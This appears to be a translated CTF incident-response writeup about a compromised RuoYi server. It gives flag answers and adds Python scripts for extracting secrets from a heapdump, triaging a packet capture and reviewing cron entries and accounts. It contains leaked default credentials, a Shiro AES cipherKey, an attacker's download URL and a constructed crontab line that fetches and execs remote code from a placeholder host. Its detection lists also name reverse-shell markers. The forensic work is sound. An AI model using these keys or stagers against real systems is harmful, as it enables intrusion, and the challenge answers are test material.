[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 110.0, userName = 测试11, userId = 11, userCode = 1000011]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 570.0, userName = 测试24, userId = 24, userCode = 1000024]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 180.0, userName = 测试2, userId = 2, userCode = 1000002]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 340.0, userName = 测试18, userId = 18, userCode = 1000018]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 330.0, userName = 测试6, userId = 6, userCode = 1000006]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 570.0, userName = 测试15, userId = 15, userCode = 1000015]
[userSex = 0, userPhone = 15888888888, userEmail = ry@qq.com, userBalance = 150.0, userName = 测试1, userId = 1, userCode = 1000001]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 250.0, userName = 测试26, userId = 26, userCode = 1000026]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 210.0, userName = 测试17, userId = 17, userCode = 1000017]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 130.0, userName = 测试22, userId = 22, userCode = 1000022]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 260.0, userName = 测试16, userId = 16, userCode = 1000016]

com.alibaba.druid.spring.boot.autoconfigure.DruidDataSourceWrapper:
[password = ruoyi123, accessToUnderlyingConnectionAllowed = true, jdbcUrl = jdbc:mysql://localhost:3306/ruoyi?useUnicode=true&characterEncoding=utf8&zeroDateTimeBehavior=convertToNull&useSSL=true&serverTimezone=GMT%2B8, dbTypeName = mysql, username = root]

com.alibaba.druid.spring.boot.autoconfigure.properties.DruidStatProperties$StatViewServlet:
[loginUsername = ruoyi, loginPassword = 123456, urlPattern = /druid/*]

org.apache.catalina.startup.Tomcat:
[hostname = localhost]


===========================================
CookieThief
-------------
not found!

===========================================
AuthThief
-------------
java.util.LinkedHashMap$Entry:
shiro.user.unauthorizedUrl = /unauth
shiro.cookie.path = /
shiro.cookie.cipherKey = c+3hFGPjbgzGdrC+MHgoRQ==

java.util.Hashtable$Entry:
author = ruoyi
jdk.http.auth.tunneling.disabledSchemes = Basic
jdk.http.ntlm.transparentAuth = disabled


===========================================

flag{c+3hFGPjbgzGdrC+MHgoRQ==}

5. Submit all the weak passwords of services that the attacker obtained, multiple values joined with &

From the heapdump output above: the Druid/MySQL password (ruoyi123), the password of the application accounts (admin123) and the Druid StatViewServlet loginPassword (123456).

flag{ruoyi123&admin123&123456}
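Reading 450 lines of JDumpSpider output by eye is error-prone, so here is an added example (my code, not part of the writeup or of JDumpSpider) that answers questions 4 and 5 mechanically: it parses the tool's text report, which mixes plain `key = value` lines, comma-separated records and `[k = v, k = v]` records, and collects passwords, username/password pairs found on the same record, JDBC URLs and the Shiro cipherKey, then checks that the key decodes to a valid AES key length. The REPORT string is a constructed excerpt in the report's format, not the full dump above.

```python
import base64
import re

# Constructed excerpt in the shape of JDumpSpider's text report: enough to
# exercise each record style the tool emits. Values mirror the dump above.
REPORT = """\
===========================================
AliDruidDataSourceWrapper
-------------
password = ruoyi123
jdbcUrl = jdbc:mysql://localhost:3306/ruoyi?useUnicode=true&characterEncoding=utf8
username = root

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = c+3hFGPjbgzGdrC+MHgoRQ==, algName = AES

===========================================
OriginTrackedMapPropertySource
-------------
spring.datasource.druid.master.password = ruoyi123
user.password.maxRetryCount = null
spring.datasource.druid.slave.password =
spring.datasource.druid.statViewServlet.login-username = ruoyi

===========================================
UserPassSearcher
-------------
com.ruoyi.web.controller.tool.UserEntity:
[password = admin123, username = ry]
[password = admin123, username = admin]

com.alibaba.druid.spring.boot.autoconfigure.properties.DruidStatProperties$StatViewServlet:
[loginUsername = ruoyi, loginPassword = 123456, urlPattern = /druid/*]

===========================================
AuthThief
-------------
shiro.cookie.cipherKey = c+3hFGPjbgzGdrC+MHgoRQ==
"""

# 'name = value' where the value may be empty (the report prints 'name =' then).
PAIR = re.compile(r"^\s*([\w.$\-]+) =(?: (.*))?$")
IGNORED = {"", "null", "None"}


def pairs(line):
    """Yield (key, value) for every 'k = v' piece on a line: plain lines,
    'k = v, k = v' lines and '[k = v, k = v]' records all end up here."""
    for piece in line.strip().strip("[]").split(", "):
        m = PAIR.match(piece)
        if m:
            yield m.group(1), (m.group(2) or "").strip()


def extract_secrets(report):
    found = {"passwords": set(), "accounts": set(), "shiro_keys": set(), "db_urls": set()}
    for line in report.splitlines():
        kv = dict(pairs(line))
        for k, v in kv.items():
            leaf = k.rsplit(".", 1)[-1].lower()      # 'druid.master.password' -> 'password'
            if v in IGNORED:
                continue
            if "password" in leaf or leaf in ("pwd", "passwd"):
                found["passwords"].add(v)
            elif leaf == "cipherkey" or (leaf == "key" and kv.get("algName") == "AES"):
                found["shiro_keys"].add(v)
            elif "url" in leaf and v.startswith("jdbc:"):
                found["db_urls"].add(v)
        # A record that carries both a username and a password is a credential pair.
        user = next((v for k, v in kv.items() if "username" in k.lower().replace("-", "")), None)
        pw = next((v for k, v in kv.items() if "password" in k.lower()), None)
        if user and pw and pw not in IGNORED:
            found["accounts"].add((user, pw))
    return found


def shiro_key_bits(key_b64):
    """Shiro's cipherKey is the raw AES key, base64-encoded; a usable key is
    16, 24 or 32 bytes. Returns the key size in bits, raises on bad input."""
    raw = base64.b64decode(key_b64, validate=True)
    if len(raw) not in (16, 24, 32):
        raise ValueError(f"not an AES key length: {len(raw)} bytes")
    return len(raw) * 8


if __name__ == "__main__":
    secrets = extract_secrets(REPORT)
    for kind, values in secrets.items():
        print(f"{kind}: {sorted(values)}")
    for key in secrets["shiro_keys"]:
        print(f"{key}: AES-{shiro_key_bits(key)}")
```

Run it against the real report with `extract_secrets(open("report.txt").read())`. The "passwords" set is exactly the answer to question 5, and the "accounts" set shows which service each password belongs to, which matters when you move on to confirm which of them the attacker actually used.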

6. Following incident-response methodology, submit the ports on which exploitation succeeded, multiple values joined with &

From the previous answers, just read the destination ports off the packet capture: 12333 (the RuoYi application, Shiro key) and 9988 (the actuator heapdump).

flag{9988&12333}

7. From the packet capture, submit the dnslog address the attacker used to confirm that the key works

dns && ip.src == 192.168.0.211

flag{1dvrle.dnslog.cn}

8. From the packet capture, submit the address and port of the attacker's reverse shell

ip.src == 192.168.0.211 && frame contains "whoami"

flag{192.168.0.251:8888}
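Questions 7 and 8 are both about what the compromised server itself reached out to. As an added example (not from the writeup), the script below works on a tshark export of DNS queries and TCP payloads (the tshark command line is an assumption, shown in the comment): it lists DNS-log domains the server resolved, and finds remote endpoints whose TCP exchange with the server contains shell interaction, reporting the peer's port, which for a reverse shell is the attacker's listener. The rows are constructed sample data, not packets from the challenge capture.

```python
import csv
import io
from collections import Counter

# Assumption: export made with
#   tshark -r capture.pcapng -Y "dns.flags.response == 0 || tcp.payload" -T fields \
#     -E header=y -E separator=/t -e frame.time_epoch -e ip.src -e ip.dst \
#     -e tcp.srcport -e tcp.dstport -e dns.qry.name -e tcp.payload
FIELDS = ["frame.time_epoch", "ip.src", "ip.dst", "tcp.srcport", "tcp.dstport",
          "dns.qry.name", "tcp.payload"]
SERVER = "192.168.0.211"
# Out-of-band / DNS-log services commonly used to confirm blind exploitation.
OOB_SUFFIXES = ("dnslog.cn", "ceye.io", "burpcollaborator.net", "oastify.com", "interact.sh")
# Strings an operator types into, or uses to spawn, an interactive shell.
SHELL_MARKERS = ("whoami", "uname -a", "bash -i", "/bin/sh", "/dev/tcp/")


def hx(s):
    """tshark prints tcp.payload as hex, so the sample is built the same way."""
    return s.encode().hex()


# Constructed rows (not the challenge capture): a benign lookup, a dnslog
# callback queried twice, an ordinary HTTP request, and a reverse shell between
# the server and 192.168.0.251:8888 in which the attacker runs whoami and uname.
ROWS = [
    ("1722220100.00", SERVER, "192.168.0.1", "", "", "deb.debian.org", ""),
    ("1722220100.50", SERVER, "192.168.0.1", "", "", "abc123.dnslog.cn", ""),
    ("1722220100.60", SERVER, "192.168.0.1", "", "", "abc123.dnslog.cn", ""),
    ("1722220200.00", "192.168.0.50", SERVER, "51000", "12333", "",
     hx("GET /index HTTP/1.1\r\nHost: 192.168.0.211:12333\r\n\r\n")),
    ("1722220300.00", "192.168.0.251", SERVER, "8888", "45120", "", hx("whoami\n")),
    ("1722220300.10", SERVER, "192.168.0.251", "45120", "8888", "", hx("root\n")),
    ("1722220300.20", "192.168.0.251", SERVER, "8888", "45120", "", hx("uname -a\n")),
    ("1722220300.30", SERVER, "192.168.0.251", "45120", "8888", "",
     hx("Linux security 5.15.0-94-generic\n")),
]
SAMPLE_TSV = "\n".join(["\t".join(FIELDS)] + ["\t".join(r) for r in ROWS]) + "\n"


def load(tsv_text):
    return list(csv.DictReader(io.StringIO(tsv_text), delimiter="\t"))


def payload_text(hexstr):
    """Decode tshark's hex payload (older builds separate bytes with ':')."""
    if not hexstr:
        return ""
    return bytes.fromhex(hexstr.replace(":", "")).decode("utf-8", "replace")


def oob_callbacks(rows, server=SERVER):
    """DNS names the server itself resolved that belong to a DNS-log service,
    in first-seen order. The label in front of the service domain is the token
    the attacker's probe carried, so a match proves the payload executed."""
    seen = []
    for r in rows:
        name = r["dns.qry.name"].lower()
        if (r["ip.src"] == server and name and name not in seen
                and any(name == s or name.endswith("." + s) for s in OOB_SUFFIXES)):
            seen.append(name)
    return seen


def reverse_shell_peers(rows, server=SERVER):
    """Remote endpoints of TCP segments involving the server whose payload looks
    like shell interaction, as [(peer_ip, peer_port, hits)] by hits descending.
    The peer port is the attacker's listener, which is what the flag wants."""
    hits = Counter()
    for r in rows:
        text = payload_text(r["tcp.payload"])
        if not text or not any(m in text for m in SHELL_MARKERS):
            continue
        if r["ip.src"] == server:
            peer = (r["ip.dst"], int(r["tcp.dstport"]))
        elif r["ip.dst"] == server:
            peer = (r["ip.src"], int(r["tcp.srcport"]))
        else:
            continue
        hits[peer] += 1
    return [(ip, port, n) for (ip, port), n in hits.most_common()]


if __name__ == "__main__":
    rows = load(SAMPLE_TSV)
    print("DNS-log callbacks from the server:", oob_callbacks(rows))
    for ip, port, n in reverse_shell_peers(rows):
        print(f"possible reverse shell to {ip}:{port} ({n} shell-like segments)")
```

The marker list is deliberately short; on a real capture, follow the TCP stream of each reported peer (Wireshark: Follow > TCP Stream) before calling it a shell, since an operator's traffic, not the markers, is the evidence.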

9. The attacker dropped fscan (renamed) on the host and used it to compromise an EternalBlue-vulnerable machine; following that lead, submit fscan's absolute path

root@security:/opt/.f/.s/.c/.a/.n# ls -a
. .. F.Sca.n result.txt

Found under /opt on the host; the result.txt next to the binary is fscan's default output file, which is what gives the renamed binary away.

flag{/opt/.f/.s/.c/.a/.n}

10. Alternative question: submit the MD5 of this fscan binary

root@security:/opt/.f/.s/.c/.a/.n# md5sum F.Sca.n 
b8053bcd04ce9d7d19c7f36830a9f26b F.Sca.n

11. For persistence, the attacker placed a simulated remote-control tool on the host; submit the download URL of this tool

The script that downloads the remote-control tool lived in /opt/.Abc. The script itself has already been deleted, but the scheduled task (the last line of the system crontab below) still references it, which is enough to infer that this is the remote-control tool.

#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/10 * * * * /bin/bash /opt/.Abc/.qxwc.sh

flag{http://zhoudinb.com:12345/qxwc.sh}

12. The attacker knew you would find it this way, so also created a related script that downloads by a different method; submit that script's absolute path

flag{/home/security/upload/.CCC/.happy.sh}
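Questions 11 and 12 are the same hunt twice: a cron entry pointing at something in a hidden directory, or fetching a payload some other way. The script below is an added example (mine, not part of the writeup) that automates that review. It flags crontab entries whose command lives under a dot-prefixed path or uses a download/connect-back primitive, and reports hidden-path targets that no longer exist, the "deleted script, cron line still fires" pattern found above. The sample crontab is constructed: stock Debian lines, the /opt/.Abc/.qxwc.sh entry from the listing above, and a made-up python one-liner stager (attacker.example is a placeholder, not the attacker's real host).

```python
import re
from pathlib import Path

# Constructed sample: stock Debian /etc/crontab entries plus the writeup's
# /opt/.Abc/.qxwc.sh line and a made-up second stager that fetches its payload
# with python instead of a dropped script (attacker.example is a placeholder).
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
#
*/10 * * * * /bin/bash /opt/.Abc/.qxwc.sh
*/5 * * * * root /usr/bin/python3 -c "import urllib.request as u;exec(u.urlopen('http://attacker.example/stage2').read())"
0 3 * * * root /usr/local/bin/backup.sh
"""

# An absolute path with at least one dot-prefixed component, e.g. /opt/.Abc/.qxwc.sh
HIDDEN_PATH = re.compile(r"(?:/[^/\s'\"]+)*/\.[^/\s'\"]+(?:/[^\s'\"]*)?")
# Download / connect-back primitives a stager can use instead of a script file.
FETCH = re.compile(r"\b(?:curl|wget|nc|ncat|socat)\b|python[0-9.]*\s+-c|perl\s+-e|/dev/tcp/")
# Where cron entries live on Debian/Ubuntu and RHEL-style systems.
CRON_LOCATIONS = ("/etc/crontab", "/etc/cron.d", "/var/spool/cron/crontabs", "/var/spool/cron")


def cron_entries(text):
    """Yield the non-comment, non-empty lines of a crontab."""
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            yield line


def review(text):
    """Entries that run something from a hidden path or pull from the network.
    'missing' lists hidden-path targets that no longer exist: a deleted script
    whose cron line still fires is exactly the pattern in the writeup."""
    findings = []
    for entry in cron_entries(text):
        hidden = HIDDEN_PATH.findall(entry)
        fetches = bool(FETCH.search(entry))
        if hidden or fetches:
            findings.append({"entry": entry, "hidden_paths": hidden, "fetches": fetches,
                             "missing": [p for p in hidden if not Path(p).exists()]})
    return findings


def cron_files(locations=CRON_LOCATIONS):
    """Every crontab file under the known locations (files and directories)."""
    for loc in map(Path, locations):
        if loc.is_file():
            yield loc
        elif loc.is_dir():
            yield from (p for p in loc.iterdir() if p.is_file())


def review_host(locations=CRON_LOCATIONS):
    """Run review() over every crontab on this machine (spools need root)."""
    results = {}
    for path in cron_files(locations):
        try:
            findings = review(path.read_text(errors="replace"))
        except PermissionError:
            continue
        if findings:
            results[str(path)] = findings
    return results


if __name__ == "__main__":
    for f in review(SAMPLE_CRONTAB):
        print(f["entry"])
        print("   hidden:", f["hidden_paths"], "missing:", f["missing"], "fetches:", f["fetches"])
    for path, findings in review_host().items():
        print(path, "->", len(findings), "suspicious entries")
```

Cron is only one of the usual persistence spots; the same regexes are worth running over systemd unit files, /etc/rc.local and the shell profile files of root and of the application user.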

13. The attacker created a hidden user; submit its username

root@security:~# cat /root/.ssh/id_rsa.pub 
ssh-rsa ... xj1zhoudi@kali

flag{xj1zhoudi@kali}

Note that the trailing field of an OpenSSH public key is a free-form comment written when the key was generated, so what it records is a name from the attacker's machine; when hunting for planted accounts on the host itself, also review /etc/passwd and every authorized_keys file.
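As an added example for this last step (my code, not part of the writeup), here is the account and key review a practitioner would run next to the cat above. It parses a constructed /etc/passwd excerpt and a constructed authorized_keys file (the key bodies are placeholders), flags UID-0 clones, duplicate UIDs and non-standard usernames, and lists key comments whose user part names no local account; review_host() runs the same checks against the live machine.

```python
import re
from pathlib import Path

# Constructed /etc/passwd excerpt: stock accounts plus two planted ones, a UID-0
# clone with a '$' in its name and an account sharing the real user's UID.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mysql:x:114:120:MySQL Server,,,:/nonexistent:/bin/false
security:x:1000:1000::/home/security:/bin/bash
sysadm$:x:0:0::/root:/bin/bash
bkp:x:1000:1000::/var/backups:/bin/bash
"""
# Constructed authorized_keys: the key bodies are placeholders, not real keys.
SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDER security@security
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQPLACEHOLDER xj1zhoudi@kali
"""
# Usernames outside this set deserve a look (the '$' suffix is the classic one).
PORTABLE_NAME = re.compile(r"^[a-z_][a-z0-9_-]*$")


def parse_passwd(text):
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _, uid, gid, _, home, shell = line.split(":", 6)
        entries.append({"name": name, "uid": int(uid), "gid": int(gid), "home": home, "shell": shell})
    return entries


def review_accounts(entries):
    """(name, reason) pairs for accounts worth a second look."""
    by_uid = {}
    for e in entries:
        by_uid.setdefault(e["uid"], []).append(e["name"])
    findings = []
    for e in entries:
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], "UID 0 but not root"))
        if not PORTABLE_NAME.match(e["name"]):
            findings.append((e["name"], "non-standard username"))
        others = [n for n in by_uid[e["uid"]] if n != e["name"]]
        if others and e["uid"] != 0:        # UID-0 clones are already reported above
            findings.append((e["name"], f"shares UID {e['uid']} with {', '.join(others)}"))
    return findings


def foreign_key_comments(keys_text, entries):
    """Comments of authorized keys whose user@host part names no local account."""
    local = {e["name"] for e in entries}
    foreign = []
    for line in keys_text.splitlines():
        parts = line.split(None, 2)
        if line.startswith("#") or len(parts) < 3:
            continue
        comment = parts[2].strip()
        if comment.split("@")[0] not in local:
            foreign.append(comment)
    return foreign


def review_host():
    """Same checks against the live system: /etc/passwd and each user's
    ~/.ssh/authorized_keys (reading other users' files needs root)."""
    entries = parse_passwd(Path("/etc/passwd").read_text())
    report = {"accounts": review_accounts(entries), "keys": {}}
    for e in entries:
        ak = Path(e["home"]) / ".ssh" / "authorized_keys"
        try:
            if ak.is_file():
                report["keys"][str(ak)] = foreign_key_comments(ak.read_text(), entries)
        except PermissionError:
            pass
    return report


if __name__ == "__main__":
    entries = parse_passwd(SAMPLE_PASSWD)
    for name, why in review_accounts(entries):
        print(f"{name}: {why}")
    print("keys from non-local identities:", foreign_key_comments(SAMPLE_AUTHORIZED_KEYS, entries))
```

A key comment is attacker-chosen and can be blank or misleading, so treat it as a lead, not proof; the UID and shell checks on /etc/passwd are what establish whether an account was actually added.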